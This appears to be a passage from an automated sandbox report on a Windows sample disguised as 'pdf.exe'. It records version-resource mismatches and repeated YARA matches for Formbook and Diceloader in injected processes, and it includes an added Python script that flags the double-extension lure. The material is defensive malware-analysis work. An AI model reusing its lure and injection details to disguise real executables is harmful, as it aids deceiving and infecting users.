Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: String function: 00007FF7D785C9D0 appears 63 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 03617E54 appears 96 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 035BB970 appears 268 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 0364F290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 03605130 appears 36 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 0363EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: String function: 059B7E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: String function: 059EF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: String function: 0595B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: String function: 059DEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: String function: 059A5130 appears 36 times
Source: 101 2043 5770 pdf.exe Static PE information: invalid certificate
Source: 101 2043 5770 pdf.exe Binary or memory string: OriginalFilename vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2294564092.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.E1 vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000000.2321404390.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2346157181.000001EC01830000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe.0.dr Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
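The "OriginalFilename ... vs" lines above record a version-resource mismatch: the file on disk is named "101 2043 5770 pdf.exe", but its VS_VERSIONINFO string table claims "TimeSeparatorCR.dll". The following script, an added example and not part of the Joe Sandbox report or the sample, shows how to pull that claim out of a raw memory dump or PE blob and flag the mismatch together with the document-style "pdf.exe" lure extension. The byte blob it scans is constructed inline in the same layout as a VS_VERSIONINFO String entry; the helper names are this example's own.

```python
import re
import struct

# Extensions attackers put in front of ".exe" so the icon/name reads as a document.
DOC_LIKE_TOKENS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}


def build_version_string(key: str, value: str) -> bytes:
    """Encode one VS_VERSIONINFO String entry (wLength, wValueLength, wType, szKey, pad, Value).
    Used only to construct test input; real samples carry this inside the RT_VERSION resource."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    val_b = value.encode("utf-16-le") + b"\x00\x00"
    body = key_b + b"\x00" * ((4 - (6 + len(key_b)) % 4) % 4)  # Value is DWORD aligned
    body += val_b
    return struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body


# Constructed blob: junk bytes around a single String entry whose value is copied
# from the report. This is NOT memory from the analysed sample.
CONSTRUCTED_BLOB = (
    b"\x90" * 17
    + build_version_string("OriginalFilename", "TimeSeparatorCR.dll")
    + b"\x00" * 4
)


def extract_version_values(blob: bytes, key: str) -> list:
    """Return every UTF-16LE value that follows a NUL-terminated UTF-16LE `key`
    in `blob`, skipping the zero padding that aligns the value to 32 bits."""
    pattern = re.escape(key.encode("utf-16-le")) + b"\x00\x00"
    values = []
    for m in re.finditer(pattern, blob):
        pos = m.end()
        while pos + 1 < len(blob) and blob[pos:pos + 2] == b"\x00\x00":
            pos += 2                      # alignment padding
        chars = []
        while pos + 1 < len(blob) and blob[pos:pos + 2] != b"\x00\x00":
            chars.append(blob[pos:pos + 2])
            pos += 2
        if chars:
            values.append(b"".join(chars).decode("utf-16-le", errors="replace"))
    return values


def lure_extension(on_disk_name: str):
    """Return the document-like token that precedes the real extension, e.g. 'pdf'
    for '101 2043 5770 pdf.exe', or None when the name carries no such lure."""
    stem = on_disk_name.rsplit(".", 1)[0]
    tokens = [t for t in re.split(r"[\s._-]+", stem.lower()) if t]
    return tokens[-1] if tokens and tokens[-1] in DOC_LIKE_TOKENS else None


def assess_sample(on_disk_name: str, blob: bytes) -> dict:
    """Compare the on-disk name with every OriginalFilename claim found in `blob`."""
    claimed = extract_version_values(blob, "OriginalFilename")
    disk_ext = on_disk_name.rsplit(".", 1)[-1].lower()
    mismatch = bool(claimed) and all(c.lower() != on_disk_name.lower() for c in claimed)
    type_mismatch = bool(claimed) and all(
        c.rsplit(".", 1)[-1].lower() != disk_ext for c in claimed
    )
    return {
        "on_disk": on_disk_name,
        "claimed": claimed,
        "mismatch": mismatch,
        "type_mismatch": type_mismatch,   # e.g. claims .dll but runs as .exe
        "lure_extension": lure_extension(on_disk_name),
    }


if __name__ == "__main__":
    print(assess_sample("101 2043 5770 pdf.exe", CONSTRUCTED_BLOB))
```

A mismatch on its own is weak evidence (repackaged installers and renamed copies trigger it too), which is why the report lists it as a string observation rather than a detection; combined with the invalid certificate and the icon mismatch in the signature list it becomes a useful triage pivot.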
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
